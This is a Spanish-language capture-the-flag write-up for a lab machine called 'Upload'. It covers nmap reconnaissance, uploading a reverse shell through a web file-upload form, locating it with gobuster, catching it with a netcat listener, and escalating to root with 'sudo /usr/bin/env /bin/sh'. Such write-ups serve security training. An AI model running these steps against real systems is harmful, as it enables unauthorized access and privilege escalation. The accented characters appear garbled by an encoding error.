# Upload
### 馃攳 RECONOCIMIENTO
En primer lugar, tras conectarnos a la m谩quina, utilizamos el comando:
```bash
ping -c 1 172.17.0.2
```
para verificar la conectividad de red.
A continuaci贸n, realizamos el comando:
```bash
nmap -sVC -p- -n --min-rate 5000 172.17.0.2
```
para realizar un escaneo de puertos y servicios detallado en la direcci贸n IP.
Como podemos observar durante el escaneo que el **puerto 80** perteneciente al **servicio HTTP** est谩 abierto por lo que a continuaci贸n se indagar谩 m谩s.
### 馃攷 EXPLORACI脫N
Se utiliza el comando:
```bash
sudo nmap -sCV -p80 -v 172.17.0.2
```
para que nos proporcione m谩s informaci贸n sobre esos puertos espec铆ficamente.
Seguimos indagando m谩s sobre los puertos y ahora indagamos sobre el **servicio HTTP**. Se ingres贸 la **direcci贸n IP** en el navegador lo que llev贸 a que la p谩gina web de subir archivos.
### 馃殌 **EXPLOTACI脫N**
Subimos una [Reverse Shell](https://www.revshells.com/).
Ahora buscaremos directorios con la herramienta **Gobuster** a trav茅s de:
```bash
gobuster dir -u http://172.17.0.2/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
```
Hemos encontrado el directorio `/uploads` que es donde estar谩 el archivo subido. Nos ponemos en escucha.
```bash
nc -nlvp 443
```
Hacemos el [tratamiento de la TTY](https://invertebr4do.github.io/tratamiento-de-tty/) para trabajar m谩s c贸modos.
### 馃攼 **PRIVILEGIOS**
Al estar dentro y ejecutar:
```bash
whoami
```
a煤n no somos **root**, por lo que hacemos:
```bash
sudo -l
```
para ver si hay algo para explotar.
Tenemos permisos **SUDO** con **env** por lo que revisamos esta [p谩gina ](https://gtfobins.github.io/gtfobins/env/)para escalar privilegios.
```bash
sudo /usr/bin/env /bin/sh
```
